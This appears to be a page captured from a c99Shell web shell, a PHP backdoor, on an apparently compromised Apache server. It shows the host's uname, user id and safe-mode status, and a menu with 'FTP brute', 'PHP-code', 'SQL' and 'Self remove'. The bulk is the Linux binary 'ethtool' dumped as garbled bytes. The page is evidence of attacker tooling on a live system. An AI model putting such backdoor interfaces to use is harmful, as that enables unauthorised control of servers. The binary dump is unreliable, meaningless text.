!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/sbin/   drwxr-xr-x
Free 52.59 GB of 127.8 GB (41.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ethtool (117.1 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ELF44 (444444ľľ@@#	#	@@HHH  Ptd  8 8\\Qtd/lib/ld-linux.so.2GNU	$#"$%)K9;gB 0XLKb]@)=FK2.x!_nFi4QB(;TYW=DF@FM:Mq5.^^^^^_4_DF8_<_L_@F____̿п0Կؿܿٳii
bii
lti	vii
@@F&DF$@@@@@AAAA	A
AAA
 A$A(A,A0A4A8A<A@ADAHALAPATAXA\A`AdAhA lA!pA"tA#Uy5@%@%@h%@h%@h%@h%@h %Ah(%Ah0%Ah8p%Ah@`%AhHP%AhP@%AhX0%Ah` % Ahh%$Ahp%(Ahx%,Ah%0Ah%4Ah%8Ah%<Ah%@Ah%DAh%HAhp%LAh`%PAhP%TAh@%XAh0%\Ah %`Ah%dAh%hAh%lAh%pAh%tAh1^PTRhhЁQVhgUS[tX[ÐUS=LFu?@-@XHF9v&HF@HF9wLF[]Ít&'U@tt	$@ÐUWVS҉Mt`X1&E9t=xS9u܋CD$D$D$@F$9uÃ[^_]ÍUWVS,E@FD$D$$łD$@FD$AD$$D$rE1rED$؂$Ot^\$|$T$D$ED$D$D$DF$Etu냍vۂ뛋E$&'UWVS9EU&U11uCCSUtz;}UM$T$uыE9uFCSUuMD$D$D$$*E;}st&9u[^_]ËU$FM4M.
9u&.:Bu.:BuE9:B:B:BU3&&'UFFFFt1Fupu\uHu4 fu@ts]F]FFdfg@uݍt&a tt&btt&mtt&utt&FFplڍv'UWVSlEeE1dFD$D$D$DF$UEGE|$D$F$5U]DFD$D$$D$u		


DF1D$D$$=D$"DFD$D$$@D$_	B	 t&fDFD$D$$΃D$|HDF$
D$DFD$D$$D$9@DFD$D$$D$]1DFD$D$$D$ 
t&t	fat	0
:
 
yf
DF$
D$DFD$D$$hD$5@DFD$D$$D$DFD$D$$<D$UBf)DFD$	D$$ED$DFD$	D$$WD$Es<*
D$DFD$mD$$/gf8_vt$fUE܉GE|$D$F$DE1
D$	D$D$DF$ED$ D$D$DF$E@&E]ԉ_E|$D$F$
E1D$D$D$D$DF$(U_E
|$D$F$MظjtyD$DFD$qD$$Ue3
l[^_]8_t$Q0svs8_$nfDF$
D$DFD$D$$vD$NDFD$D$$΃D$)DFD$D$$ރD$zt&0DF$
D$DFD$D$$vD$DF$
D$DFD$D$$vD$]v8_t$1ۅHDFKD$D$$D$t&fDFD$D$$΃D$XDF$
D$DFD$D$$vD$DFD$D$$΃D$n9DFD$D$$/D$8DFD$D$$D$DFD$D$$aD$DFD$D$$|D$E<wn$`t&‰D$DFD$OD$$d&DFD$D$$D$SGD$DFD$mD$$ED$D$D$DF$DFD$D$$D$Et/,WDFD$	D$$ED$%DFD$	D$$ÄD$~}t.D$DF1D$ׄD$$+DFD$D$$D$N)DFD$D$$D$ .DFD$D$$D$vDFD$D$$'D$fDFD$D$$,D$SfDFD$D$$1D$#pDFD$
D$$hD$CDFD$D$$D$gt&DFD$D$$6D$5DFD$D$$.D$NED$D$JD$D$DF$D+D$D$JD$D$DF$uʡDF1$
D$1&DFD$D$$D$6DFfD$
D$$ZD$lxFDF$
D$yDFD$D$$vD$$DFD$D$$ރD$DF$
D$DFD$D$$vD$DF$
D$DFD$D$$vD$xDFD$	D$$̈́D$NDFD$D$$gD$$<DFD$D$$D$DFD$
D$$D$DFD$D$$D$}DFD$D$$D$|SDFD$D$$D$R)t&DFD$D$$D$ rvDFD$D$$D$9vDFD$
D$$hD$vDFfD$
D$$ZD$fDFD$D$$D$`vDFD$D$$D$0DF$
D$FDFD$D$$HD$
UH},]ӉuDž,eE1zT$D$F4$ y4$HUe3]u}]ÍE$D$bu$ЎI몋EBS\$D$F4$y)$ͅ\$^JYFFD$$y$'T$$D$D$$JBD$Ѓ\$D$$$5Fu31ۍ0`D$ t$$SuաDF1D$D$$D$DFD$D$$
D$ZtjDFt$D$D$$9\0D$!D$D$DF$9rv
u떡DFD$D$$~D$$]1[DFD$D$BD$Ѓ$d$jD$D$D$FD$@F$P$'$K<$D$dE뾍UueE1,]Ӊ}Dž,BT$D$F4$py4$H;Ue3]u}]Ít&E$D$u$I몋EW$D$D$EG1=AG{\$D$F4$y#$=J<$9E$D$u$$I;<$CE䋕D$$D$@EBS\$D$F4$y,$IJ<$$d_u]\D$DFD$fD$$Eu7DF$
D$<$]$Oa롡DFD$D$$}D$EtDž  t$ D$D$DD$DF$5  9EwDUeE1uu}]dFD$4$D$D$D$$yy0$F2Ue34]u}]á`FL6rt&	
t&4/
t&n5t&KEf DžẺt$D$F$K4$fGhFDžt$D$FẺ$$yvFFDt1DžẺt$D$F$wx1$1>DžẺt$D$F$2$GǐDž	Ẻt$D$F$$o}E}̉t$D$F$x	FtFE䡘Ft<|GE}GE~GEGEGEGEE}̉t$D$F$$n$ЏF4	FH@FD$D$$lD$At&Dž}̉t$D$F$hDtfDtDtDtDtDtDt%?Dž}̉t$D$F$1$=Dt%@FD$D$$͆D$"=Dt%@FD$D$$D$=Dt%@FD$D$$D$=Dt%@FD$D$$D$=Dt%@FD$D$$#D$j=D2@FD$D$$>D$8DžỦt$D$F$$Jc,DDžDžt$FD$F$FE,$WFdFD$D$D$DF$!FEFt$D$F$$`Ls<DžFEFt$D$F$_	$`M&\1D$<D$D$D$DFD$HD$$JdFD$/D$D$DF$ GE Gt$D$F$$,Rq:lDž GE Gt$D$F$R$,LdFD$eD$D$DF$^FEFt$D$F$e$ Ly=D
U
FD9s)ʉDD$D$|Y$KIDžFEFt$D$F$5LB@@FPD$%D$$PD$PdFD$~D$D$DF$Dž}̉t$D$F$DžDž}̉t$D$F$OWDžDž}̉t$D$F$DžDž}̉t$D$F$DžDž!}̉t$D$F$IDžDž#}̉t$D$F$SDžDž+}̉t$D$F$g.u.u.u.uDž.u
Dž.u.uL$$D$DF|$1\$ t$L$T$D$tD$$$@$E%@F^D$D$$҈D$D}@FD$D$$YD$$TyDFSD$D$$D$
$0Dž$Dž$DžX$Dž$dDž$@DžDž@UD=F.u5F.uF.uD$DFT$L$D$<D$$DF1$
D$|DAFAM̉t$D$F$$J|$p5LG.uHG.uD$DF1T$D$LD$$tGD$XpGD$TlGD$PhGD$L`GD$H\GD$DXGD$@TGD$<@GD$8<GD$48GD$04GD$,0GD$(,GD$$(GD$ $GD$dGD$PGD$АD$D$xGD$DGD$DF$KCp GE Gt$D$F$U$xQD1=DDžt$ED$F$?$(T|B:@FND$&D$$D$*FD$D$D$FD$FD$FD$DF$GD$ؒD$D$FD$FD$FD$DF$J
FDF1|D$BD$D$Ѓ$*|$U1ҡD1=DDžt$ED$F$_$LU&:u1:u":u:DF1D$D$$D$1DFD$D$$ˇD$|1R|AD$ڇD$D$DF$|\D$D$D$DF$~|;rs,u닋|$L$V;DF1$
D$~$D$M$ǍD$.xGO}̉t$D$F$[yK$\+<$`.x$ |$T${RxJỦt$D$F$y[$<$ax$^@F_D$D$$D$/DF1D$_D$$D$xDT\$ D$ D$DFT$D$)D$$b;u<$1x$FEFn=E1=EDžt$ED$F$tY$pVVFEFt$D$F$L$O
ExX1=EDžt$ED$F$t$XzExX1=EDž"t$ED$F$t$ЕYPExX1=EDž$t$ED$F$$t$ZExW1=EDž,t$ED$F$H$<]S*DF1D$D$$D$'L$qUWVSQhIEM"vY`F/
t&`t
kMMuC9EFElŰMU9uM:Ao9u]D;]=DdFdF$6v
hY[^_]aË`FBvGtBt=vt5	t0
t+t%t 
tttttuUBdFEt&`F9D$D$D$U$hF50ۅt[U1RU)D$Eĉ$t#t\$Mĉ$uċ`F=`F`CUdF[D$D$A$lFvUًE])D$D$B$pFϋU:B:B:B]Dd:AD
D$D$@B$tFIuTs9uFcE[4uD0D$D$B$xFD$D$B$|FD$D$C$F
DD
d='=	C='DM:Muu}AKD$D$`D$FMUA8-1	uIu=]D	uAAuNt]D'uS9UFUMȋEe
9u*f:Bug:BuDh9u?i:Bu3j:Bu'k:Bu]Dl9u9m:Bu-n:Bu!o:Bu]Dp9u9q:Bu-r:Bu!s:Bu]DItu\]D#u`=D]ȃD,Duzs9u+M.
9.:B.:BFD5u8s9uF
D$D$D$M$D:vPq9uR:BuF:Bu::Bu.^FDQ?^,]̃DDu
s9uF
D$D$D$U$DDDuRDt#=DDID1D =DoDuuJs9uF
E	4uDU:up:Bud:BuX:BuL9]F
MF]a<$tu9]F
ED$ED$ED$ED$u؍E܉D$t$D$U$肿1ҋ|GuFmus9u
D$D$D$M$D|mu	D
FBF
FָoF뻃
F 벃
F멃
F렃
F@뗸0뚃
F낐UWVS<DF]D$D$D$$s贽DFD$D$$D$菽CD$D$D$DF$KFD$ȞD$D$DF$'FD$D$D$DF$FD$8D$D$DF$߻DF$
D$DFD$D$$D$żDFD$D$$D$蠼Fnuu!D$DFL$T$D$lD$$8Fu!u!D$DF*L$T$D$D$$Fu.*u. u!D$DFL$T$\$D$D$$芺FD$D$D$DF$fDF$
D$衻DFD$D$$1D$LDFD$D$$D$'F E*uE.E*uE.*u.*u.E*uE.*x.ML$$M|$\$L$ MD$DFT$D$L$D$$[F$EuE!u!u!u!EuE!U|$\$L$T$ MD$DFD$D$L$$ȸDF$
D$DFD$ D$$DD$讹DFD$D$$D$艹F(D$F,D$hD$D$DF$>DF$
D$yDFD$D$$FD$$DFD$D$$D$V0 л\%=ti@tP*t?D$DF\$L$D${T$D$D$$r<1[^_]ø.v*uDFD$T$D$D$$'<1[^_]ÐUSÃD$DFD$TD$$u^%u+DFD$D$$jD$ط[]ÉD$DFD$D$$葶[]ÍvDFD$D$$RD$胷[]Ðt&UD$DFT$D$D$$-ÍvUWVS,]C
DF{D$D$$D$DFD$D$$D$[]D$кT$\$D$D$DFD$$c?DFD$*D$$XD$Pu˱ۺ۱x߱D$D$DFT$D$D$$WGq_uI t D$DFt$L$T$\$D$<D$$TtS@D$DFL$T$D$D$$fDžUDž
"DžDž۾( 2v;SE5t&\$(\$$\$ D$DFt$L$\$T$D$ԥD$$WDžMu
DžRDžZu
Dž]Džau
DžDž|u
DžDžu
Dž Džu
Dž@Džu
DžDžx
DžDž u
DžDžu
Džv
@Džڲu
Dž DžZu
Dž]оP(uuD$LD$HD$DD$@D$<D$8D$4D$0D$,L$$D$(D$ D$(T$t$\$D$DFD$@D$$GDž/u
DžDžIu
DžDž u
DžDžDu
Dž Džau
Dž@Dž{u
DžDždx
DžDžu
DžDžu
DžDžu
DžDžu
Džгu ufxDž$̧u
Dž$T$HT$DT$@T$<T$8T$4T$0T$,T$(T$$L$t$\$T$ $D$DFD$D$\$$G G$D$<D$D$DF$ƮG,D$pD$D$DF$袮G0Džu
DžDžu
DžDžгu
DžDžu
Džu 0u@JuDž$ax
Dž$T$,T$(T$$t$\$L$T$ $D$DFD$ĨD$\$$螭W4Dž|yu
Dž|Džxu
DžxDžtu
DžtDžpu
DžpDžl<u
Džl Džhdu
Džh@uDž(x
Dž(Džd´u
Džd Dž`ִu
Dž`@ufҹx|D$LxD$HtD$DpD$@lD$<h\$4D$8Ћ(D$,	D$(
D$$\$0D$ dD$DF`T$t$L$\$D$D$$׫W8Dž\!u
Dž\DžX7u
DžXDžTNu
DžTDžPcu
DžP`DžL u
DžLDžHPu
DžHDžDpu
DžDDž@u
Dž@u ϵu@u\\$<X\$8T\$4P\$0 \$,L\$(H\$$D\$ @D$DFt$L$\$T$D$D$$CG<Dž<u
Dž<Dž8u
Dž8Dž4+u
Dž4Dž0u
Dž0 Dž,u
Dž,?uQuhuu Dž$u
Dž$<T$48T$04T$,0T$(,|$ t$\$T$$L$$D$DFD$ D$\$$,1[^_]ÐDF{D$D$$D$DFD$D$$D$Ʃ[غ۱к
D$DFL$t$T$\$D$hD$$7?
DFD$*D$$XD$$u˱ۺ۱x߱D$D$DFT$D$D$$趧WGE_uI t D$DFt$L$T$\$D$<D$$(@EŶζ@xJDž((&Et$L$T$D$DF(D$D$$T$莦fE
E
E(c
 2@
ض
;E]\$$]\$ ]D$DFt$L$\$T$D$D$$֥WEMuEREZuE]EauEE|uEEГuE EuE@EȬuEExEE uEEuEv
@EڲuE EZuE]оP(uҹ@xED$LE܉D$HE؉D$DEԉD$@EЉD$<ẺD$8EȉD$4EĉD$0ED$,E\$$D$(]\$ ED$DF(L$T$t$\$D$@D$$!GE/uEEIuEE uEEDuEEݶuE EauE@E{uEEdxEEuEEuEEuEEгuE u@hufxDž$̧u
Dž$UT$LUT$HUT$DUT$@UT$<UT$8UT$4UT$0UT$,UT$(UT$$UL$t$\$T$ $D$DFD$D$\$$oG OW$EuEDž|u
Dž|Džxu
Džx 8u@ufҹ xЃD$DD$@D$<D$8D$4D$0D$,D$(ED$$|D$ xL$T$t$D$DF\$D$ܬD$$NG(D$LD$D$DF$*W,&u‰D$DFT$L$D$D$$W0Džtu
DžtDžpгu
DžpDžlu
DžlDžhu
Džh Džd0u
Džd@Dž`Ju
Dž`Dž\ax
Dž\DžXЭu
DžXDžTu
DžT=uZuй$fҋ(xtD$DpD$@lD$<hD$8dD$4`D$0\D$,XD$(Tt$ \$D$$Ћ(D$DFT$\$ȮL$D$DD$$%W4uuwuD$%D$DFT$\$L$D$D$$连W8DžP!u
DžPDžL7u
DžLDžHNu
DžHDžDcu
DžD@`Dž<@u
Dž<Dž8x
Dž8Dž4u
Dž4Dž0Pu
Dž0Dž,pu
Dž,Dž(u
Dž(u ϵu@ufDž(tx
Dž(PD$HLD$DHD$@DD$<@D$8<D$48D$04D$,0D$(,D$$(t$\$L$D$ DF(T$D$D$\$$ÜG<Dž$u
Dž$Dž u
Dž Dž+u
DžDžu
Dž÷Džu
Dž Džu
Dž@DžǷu
DžDžݷx
DžDž?u
DžDžQu
DžDžhu
Džuu u@
ufDž$ x
Dž$$T$L T$HT$DT$@T$<T$8T$4T$0T$,T$(|$ t$\$T$$L$$D$DFD$D$\$$跚,1[^_]fD$DFD$D$$臚~߱D$DFD$D$$GE;֍ 2\Є۾(Dž5fDžDžƐDžDžDžDž
<#۸!E
;֍ض 2Eԍt&EE(lEEDDž(Dž(׍@`֍ζE붐DFD$D$$D$DFD$D$$D$UWVSlUBZE,]tl[^_]fBEԋBfEءDF\$D$D$$R؃<nDFD$-D$$<D$<%V$DFD$$D$$lD$fEjxEn@EjuEn EjuEnjunjunjunjunjun]\$(]ĉ\$$]ȉD$DFL$T$\$ |$t$D$D$$	]ءDFD$D$\$$؃w$ $<t&DFD$'D$$D$Ö%w$pt&DFD$'D$$0D$胖junD$DFD$XD$$3f}EjxEn@EjuEn junjunjunjunjun]̉\$$]ЉD$DFL$|$\$ t$T$D$D$$联1m}DFD$)D$$D$l}vUB DFD$D$$
D$*l1[^_]áDFD$)D$$D$DFD$-D$$D$ϔDFD$%D$$D$襔DFD$D$$D${1DFD$*D$$пD$ODFD$(D$$D$%]DFD$)D$$(D$3DFD$(D$$TD$ѓ	DFD$,D$$D$觓DFD$:D$$D$}<DFD$;D$$D$SDFD$@D$$D$)DFD$*D$$D$wDFD$(D$$D$ՒMDFD$)D$$0D$諒#DFD$:D$$\D$聒DFD$-D$$D$WDFD$,D$$D$-DFD$5D$$D${DFD$$D$$ԻD$ّDFD$)D$$D$译nDFD$,D$$(D$腑DDFD$%D$$XD$[DFD$D$$D$11vUWVS|]S,t
|[^_]Íf=w
$vEDFsD$D$$D$蹐DFD$D$$D$蔐[Eğ@uEħEȟuEȧE̟uȨۿjxn@uRuEuEEĉD$(EȉD$$Ẻ|$L$T$D$ E\$D$D$D$DF$觎}jjغ%t=t=t2 D$DF|$L$T$D$D$$^u`u[D$DFT$\$D$D$$э}?Raغ%t@tt2 !D$DFL$D$T$D$@D$$S^E"uE@E'uE/EܟuEܧEuEfE8xE?غF%t=Jt=NtRf EuEEuEuuEuEEԉD$8E؉D$4E܉D$0ED$,ET$$D$(ED$ E|$L$D$E\$D$D$D$DF$}غ[%=t=at=ftRT$DFD$D$$蕋FD$D$D$DF$qFD$PD$D$DF$MFD$D$D$DF$)FD$D$D$DF$^@uuuD$DFL$T$\$D$D$$襊}v3uD$DFD$D$$lF D$D$D$DF$HF$D$D$D$DF$$F(D$<D$D$DF$F,D$pD$D$DF$܉F0}tttDFT$D$D$$薉|1[^_]f}+EuE ]f۹cغ%t@tt2 u]ЉD$DFL$|$\$T$D$D$$غk%=p=uyRfعn%+	t&nj˸ع%ڸktptutyD$S	t"@	EE
EEE	vEt&Et&Et&Et&Et&E
t&rEt&bEt&REt&BEt&2Et&"UVS DFuD$D$D$$^ŇDFD$D$$D$蠇FD$D$D$D$DFD$$LCD$D$D$D$DFD$$CD$D$D$D$DFD$$CD$&D$D$D$DFD$$谅CD$5D$D$D$DFD$$|CD$AD$D$D$DFD$$HCD$MD$D$D$DFD$$C@D$YD$@D$D$DFD$$CDD$`D$DD$D$DFD$$謄CHD$gD$HD$D$DFD$$xCLD$mD$LD$D$DFD$$DCPD$rD$PD$D$DFD$$CTD$D$TD$D$DFD$$܃D$D$D$D$DFD$$襃D$D$D$D$DFD$$nD$D$D$D$DFD$$7D$D$D$D$DFD$$D$D$D$D$DFD$$ɂ4D$D$4D$D$DFD$$蒂DD$D$DD$D$DFD$$[HD$D$HD$D$DFD$$$D$D$D$D$DFD$$ 1[^]ÐUWV1S|]CEC{D$$D$ց$LG0D$0G,D$,G(D$(G$D$$G D$ GD$GD$GD$GD$GD$GD$$D$iD$$U[tVD4t$D$$D$%97v)tuD$$뷍&D$1$OtSv\$D$$D$貀9_v%tuD$$萀붍D$$tWtm41ۉ\$D$t$D$$=9_v8ۋ4tȉغVUUU)R9uD$$$0D$$D$$LClD$pChD$lC\D$hCXD$dC(D$`C$D$\CLD$XCHD$TCDD$PC@D$LC<D$HC8D$DC4D$@C0D$<CTD$8CPD$4C D$0CD$,CdD$(C`D$$CD$ CD$CD$CD$CD$CD$D$8$D$~CpD$0$D$~EEEt}F^D$$D$~$LC(D$(C$D$$C D$ CD$CD$CD$C,D$CD$FD$$D$$~|1[^_]$,8EGF^D$A$D$}$LCD$CD$FD$|$D$}EF^D$S$D$|}$L~CD$FD$f$D$K}UWVSL]{t	L[^_]ÐDFsD$D$$D$}DFD$D$$D$}C@`CvD$DFL$T$D$D$$J|Ffx@u	 fD$DF\$|$T$L$D$D$${^$E)EfE8غF%t=Jt=NtRE{T/EED$,ED$(ET$ D$$E|$L$D$E\$D$D$D$DF$zغ[%=t=at=ftkDFT$D$D$$zF8D$D$D$DF$rzF<D$PD$D$DF$NzF@D$D$D$DF$*zFDD$D$D$DF$zD$DFT$D$D$$yD$LD$D$DF$yD$D$D$DF$yD$D$D$DF$YyD$D$D$DF$2yL1[^_]Et&Eԍt&E~ЉغF%E?E#fEE8fEEɍt&fNft&ܺUS˃ЋMu0t%L$DF\$D$D$$w[]ÐED$ύ&UWVSuF~= DFD$
D$$1D$xDFD$D$$?D$qxFt>11WD$DFVD$OD$T$$wF9w1[^_]ÉD$@FD$ D$D$$vȍv'UWVSDF]D$D$D$$awDFD$D$$D$wUBD$D$D$DF$EvMAtu/tu/DFL$T$D$8D$$uC$CD$\D$D$DF$uSDž4x
Dž4%@Ƀᦃd Dž8u
Dž8vDž<u
Dž<Dž@u
Dž@DžDu
DžDf% DžHv@+DžPDžLDžTu
DžT!DžXu
DžX/Dž\!u
Dž\!uDž0۱u
Dž0߱4?L$D8T$4H|$D$H<L$@@T$,Tt$(D$<DL$8LT$0D$D$0PL$$XT$D$D$ \L$D$DF$sCD$D$D$DF$sCK`D$D$D$DF$~sC uuuuDF|$t$L$T$D$,D$$s`d"CD$D$D$DF$rCUD$$tD$$tC	D$$tCuD$$tCT,D$$tC34 D$$tC?@D$$tCLD$$tCZD$$tCjD$$tCrD$$tCm~D$$tCLD$$tC+ D$$tC
@D$$tCD$$tCD$$tCD$$tCD$$tCeD$$tCDD$$tC#-D$$tC?D$$tCCD$D$D$DF$oD$m$CD$m$C{	D$m$CZD$m$C9,D$m$C4 D$m$C?@D$m$CLD$m$CZD$m$CjD$m$CsrD$m$CR~D$m$C1D$m$C D$m$C@D$m$CD$m$CD$m$CD$m$CkD$m$CJD$m$C)D$m$C-D$m$C?D$m$CCD$(D$D$DF$lCu!D$DFD$tD$$ylC D$\D$D$DF$UlC$D$D$D$DF$1lS$Džd%px
Džd!@Džhu
Džh! Džlu
Džl!u!t	Hf拍dЃ?%?D$D$DFL$,hT$T$|$ L$(lt$D$D$L$$$MkC0D$D$D$DF$)kC4D$D$D$DF$kC4Džppx
Džp@Džtu
DžtDžxu
DžxuҾt	Jf拕p>苍tD$D$DFT$$xL$ t$s<|$T$D$D$$0jC<D$D$D$DF$jC<u!u!DFL$T$D$D$$if>C@s@D$<D$D$DF$iC@C@C@C@C@fC@ @C@@f{@fCACAFfF F@FFfjFFFfFF&F fJF@pCDKD|D$dD$D$DF$|hCDx!@u! u! u%D$DF|$t$L$T$D$D$$h|@@CHD$4D$D$DF$gCHExE!@EuE EuEEuEEuEEuEEuEEuEu@u u!u!ET$L$|$D$8Et$D$hD$D$4ED$0ED$,ED$(ED$$ED$ ED$DF$fCLD$xD$D$DF$^fURCPD$D$D$DF$,fCPCTD$D$D$DF$eCXD$D$D$DF$eC\D$DD$D$DF$eC\C\yC`D$D$D$DF$weC`D$D$D$DF$SeCdD$D$D$DF$/eCdD$D$D$DF$eChD$D$D$DF$dChD$D$D$DF$dClD$4D$D$DF$dClD$D$D$DF${dCpD$hD$D$DF$WdCpD$D$D$DF$3dCtD$D$D$DF$dCtD$D$D$DF$cCxD$D$D$DF$cCxD$D$D$DF$cDF$
D$dDFD$D$$D$dDFD$D$$D$ddD$D$D$DF$cE% ঃduE!uuvD$E|$L$D$8D$DFD$$bFBF(F@t&f>UD$D$D$DF$HbEfxE@EuE EuEEuEEuE@u uuuET$|$t$D$,EL$D$D$D$(ED$$ED$ ED$DF$[aUWMD$HD$D$DF$aD$|D$D$DF$`Љ%L$
L$D$D$D$D$	¡DFT$$`D$D$D$DF$z`D$0D$D$D$DF$L` 
@
m
0
 yf;D$ D$D$DF$_D$0D$D$D$DF$_ @l/

x
 ;
@	f	ED$D$D$DF$^uuuuDFT$|$t$L$D$LD$$}^UD$D$D$DF$D^D$0D$D$DF$^EuEEuEĵuvйZ
uUD$DF|$L$T$UD$dD$$T$] @Y> FF fD$D$D$DF$+]u!D$DFD$*D$$\MD$D$D$DF$\Em@uE EmuEmumumumuẺT$|$t$D$ EЉL$D$0D$D$DF$$\Uf:FD$D$D$DF$[D$LD$D$DF$[D$D$D$DF$[D$D$D$DF$z[D$D$D$DF$R[MD$D$D$DF$"[E`uEإEiuEvu!uuu!E؉T$|$t$D$ E܉L$D$D$D$DF$ZU <	D$D$D$DF$HZ%Ƀu5t&E`uEҿxЃL$ MD$D$DFt$L$|$D$D$$YE䋃D$|D$D$DF$YEuE!E!xE XE!!u!uEL$M|$t$D$$EL$T$D$D$ DFD$$XE@t%DFD$D$$DD$YDF$
D$YDFD$D$$D$YDFD$D$$D$tYD$dD$D$DF$-XD$D$D$DF$XD$D$D$DF$WD$D$D$DF$W1[^_]ÍvELfDFD$D$$QD$XuHDžP!DžLC% uDžHfDžHE놡DFD$D$$CD$WDFD$D$$D$W+t&DFD$D$$D$sWDFD$D$$D$CWDFD$D$$D$W}DFD$ D$$$D$VDDFD$D$$D$VDFD$D$$D$VDFD$D$$eD$SVDFD$ D$$D$#VDFD$D$$D$UDFD$D$$D$U^DFD$D$$~D$U!DFD$&D$$D$cUDFD$&D$$D$3UDFD$$D$$|D$UjDFD$$D$$TD$T-DFD$D$$eD$TDFD$D$$D$sT]DFD$D$$LD$CT DFD$D$$.D$TDFD$)D$$D$SDFD$)D$$D$SiDFD$'D$$D$S,DFD$'D$$XD$SSDFD$D$$D$#SDFD$ D$$$D$RDFD$D$${D$R&DFD$D$$D$RDFD$D$$D$cRDFD$ D$$D$3RDFD$D$${D$RDFD$%D$$D$QDFD$ D$$D$QrDFD$'D$$D$sQC@DFD$D$$D$CQC@ DFD$&D$$D$QC@@DFD$&D$$8D$P{@wDFD$&D$$`D$PCAQDFD$&D$$D$PCA+DFD$#D$$D$SPFDFD$$D$$D$#PFDFD$D$$D$OF@DFD$D$$D$OFDFD$D$$D$OFqDFD$ D$$D$cOFKDFD$ D$$@D$3OF'DFD$D$$D$OFDFD$D$$D$NFDFD$D$$ D$NF DFD$D$$:D$sNF@DFD$D$$TD$CNkDFD$D$$nD$N@DFD$'D$$D$MFDFD$%D$$D$MDFD$$D$$pD$MDFD$"D$$D$SMDFD$D$$D$#M]DFD$D$$xD$L#,D$((D$$$D$  D$D$D$D$D$D$D$DF$[KDFD$$D$$D$QL5t&DFD$&D$$D$#LUWVS,E]P@UD$1$EC$D$J\$1D$>$JD$K$J&UZD$T$D$Ju$
0J@\$D$[$iJUDZD$T$D$IJ\t@ރtUDZD$T$D$Jũ$
&J\u$
1JEEdÉEKt&|$D$f$ID$T$D$IE}t5tD$T$D$pIu$
I$
qI}fu1ۋUUD؃D$D$q$ID$T$D$H;]t>߃tD$T$D$Hu$
H;]uƒ$
HUuBD$$D$jHEXf]@b @


t&
o
@M
 +
	
t&			t&x	$
vGFD$$D$G^@'		t&y@W t&0t&$
v3GFD$$D$F^f
@hF$@z t&T2t&$
sFF
D$,$D$7F^
f@J(@~ \t&6t&$
EFD$\$D$E^f^@O -f`@> t&t&i$
DFD$$D$DFPD$$D$DFRD$$D$zDFTD$$D$^DFVD$<$D$BDD$h$D$#D	f=$&0vQf=&&
I
f='&t&
f=(&$D$
Cf=!&t&
f=#&	f= $$DD$y$cC~D$n$JC\D$d$1C:D$[$CD$R$BD$J$BD$A$BD$9$BD$0$BfD$($BDD$ $iB"D$$PBD$$7BD$
$BD$$BD$$A>D$$AD$$AD$$AD$$AD$$oAD$$VAiD$$=AGD$$$A&D$$AD$$@D$$@D$$@D$$@BD$$@ D$w$u@D$o$\@D$f$C@D$^$*@D$X$@mD$O$?KD$H$?*D$B$?D$7$?D$-$?D$$${?D$$b?D$$I?"D$$0?D$$?D$$>D$$>D$$>nD$$>LD$$>&D$$>D$$h>D$$O>D$$6>oD$q$>HD$$>&D$$=D$$=D$$=D$M$=D$$=xD$$n=WD$s$U=0D$$<=D$$#=D$$
=D$$<D$|$<$=D$$D$<D$/$fT$D$~<D$$D$_<D$$D$@<$
T<UD$$D$<E@>ۍvt&kI$
;UBD$L$D$;UB$D$x$D$o;UD$$D$M;Ef tD$$!;$
5;UB.D$$D$:UB0D$$D$:UB>D$,$D$:UB@D$X$D$:UBFD$$D$z:,1[^_]D$$\:D$}$C:|D$v$*:UD$m$:3D$c$9D$Z$9D$S$9D$I$9$:$:v$:$:D$$M9D$$49ED$$9D$$9D$$8$:UЉWVS\E+uEEuEEuEEuEEuE EuE@uҾxu@ufxE܉|$t$\$D$4EL$T$D$D$0ED$D$,ED$(ED$$ED$ DF$u7\[^_]Ðt&UWVSE\}
EGLEGLw%|t9EuE9CtEu9Ct7@FD$D$$D$8\[[^_]ûE1E
t&wՠE9uUvEDFL$D$D$$6FD$ FD$FD$FD$FD$GD$D$D$DF$A6FD$FD$D$D$DF$6}
E}
EE}
}FD$FD$FD$FD$D$D$DF$5F,D$F(D$F$D$F D$D$D$DF$u5UUF0D$D$D$DF$?5FD$FD$PD$D$DF$5F$D$F D$D$D$DF$4F,D$F(D$D$D$DF$4UUDF0D$D$D$DF$4^6\$F4D$D$D$DF$V4te*1z?WG?D$DF|$L$T$D$PD$$3F7`u.u.uD$DF|$\$L$D$|D$$3}	F<D$D	D$D$DF$Y3F<F>D$	D$D$DF$+3F>FL%D$FHD$FDD$UD$	D$D$DF$2FRD$FQD$FPD$
D$D$DF$2}[}FTD$D$D$DF$u2FXD$D$D$DF$P2FYD$(D$D$DF$+2}	F\D$pD$D$DF$1F^D$D$D$DF$1F`D$4D$%D$DFT$$1FdD$D$%D$DFT$$s1FhD$D$%D$DFT$$A1FlD$D$%D$DFT$$1FpD$D$%D$DFT$$0FtD$xD$D$DF$0}vYF|D$FxD$D$D$DF$0}t(D$D$D$DF$Y0}}*}D$(D$$D$ D$D$D$D$D$D$D$DF$/D$HD$DD$@D$<D$8D$4D$0D$,D$(D$$D$ D$D$D$D$D$D$D$DF$	/D$(D$$D$ D$D$D$D$D$(D$D$DF$.}vfEv-}t'D$D$D$DF$V.}t(D$<D$D$DF$(.}}
}t}\1[^_]FXD$D$D$DF$-G?1^DFD$xD$\$$i-@ vU"D$D$ȃD$D$ЃD$DFT$L$$,D$D$PD$D$DF$,D$D$D$DF$,}kD$D$D$DF$R,\1[^_]FVD$FUD$FTD$FSD$HD$D$DF$,FXD$8D$D$DF$+F\D$pD$D$DF$+FdD$F`D$D$D$DF$+FhD$
D$%D$DFT$$e+FlD$
D$D$DF$@+D$D$D$D$
